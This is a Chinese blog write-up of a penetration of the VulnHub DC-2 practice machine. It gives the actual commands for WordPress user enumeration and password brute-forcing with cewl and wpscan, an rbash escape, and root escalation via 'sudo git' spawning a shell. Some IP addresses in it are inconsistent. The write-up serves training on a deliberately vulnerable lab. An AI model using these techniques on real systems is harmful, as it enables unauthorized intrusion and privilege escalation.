freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

vulnhub之DC-2靶机渗透详细过程
2022-01-23 00:44:28
所属地 香港

vulnhub之DC-2靶机渗透详细过程

nmap 192.168.26.0/24

发现靶机IP:192.168.26.130

kali IP:192.16826.20

nmap -sS -sV -T4 -A -p- 192.168.26.130

访问其80端口发现不解析,

图片.png

发现80端口开启,打开浏览器输入ip访问,发现页面无法加载,添加本地DNS解析:

vim /etc/hosts

添加192.168.159.139 DC-2

图片.png

图片.png

访问网站,发现发现flag1,提示cewl,搜索cewl发现是kali自带的一个密码字典生成工具。

使用cewl 访问该网站,并将生成的字典写入到dc2_passwords.txt

cewl -w dc2_passwords.txt http://dc-2

使用wpscan发现了三个用户

wpscan --ignore-main-redirect --url 192.168.26.130 --enumerate u --force

图片.png

通过已经扫描到的用户名和cewl生成的密码字典对目标主机(dc-2)进行爆破

wpscan --ignore-main-redirect --url 192.168.26.130 -U dc-2_user.txt -P dc2_passwords.txt --force

图片.png

Username:tom         					Password:parturient
Username:jerry						    Password:adipiscing

成功获得tom 和jerry的密码,尝试使用ssh登录,发现tom用户可以使用ssh登录,使用以下命令,并输入tom的密码即可登录tom账号

ssh tom@192.168.26.130 -p 7744

登录后我们会发现,我们是一个受限制的shell,有关受限制的shell这里不多说,这里推荐一篇文章大家可以去看看

链接:https://xz.aliyun.com/t/7642#toc-0

图片.png

接下来我们就需要使用一些方法逃逸出rbash,我们输入以下两条命令来逃逸出这个受限制的shell

BASH_CMDS[a]=/bin/sh;a
 /bin/bash

执行完这两条命令后我们再执行下面的命令,我们可以发现我们现在的shell不再是-rbash了,变成了正常的bash,但是我们还是无法执行命令,因为我们需要添加环境变量才行。

图片.png

我们执行以下命令,添加环境变量

命令1:export PATH=$PATH:/bin/
或者
命令2:export PATH=/usr/sbin:/usr/bin:/sbin:/bin

图片.png

接下来切换到jerry用户

su  jerry
cd /home/jerry
ls
cat flag4.txt

图片.png

根据flag4的提示信息,明显是要使用git提权

find / -user root -perm -4000 -print 2>/dev/null   #发现具有suid权限的命令

图片.png

使用命令:sudo -l,查看可以无密码使用root权限的命令,果然是git

图片.png

输入以下命令即可提权成功
sudo git help config 
h
!/bin/bash

图片.png
DC-2靶机到这里就结束了,这里简单总结一下DC-2靶机的考点,首先就是cewl和wpscan工具的使用,其次是mysql数据库的增删改查,然后就是rbash的逃逸以及sudo的提权。总体来讲,我还是通过DC-2靶机学到了一些之前不了解的知识点,例如rbash。

# 渗透测试 # VulnHub # vulnhub靶机 # Sudo提权
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录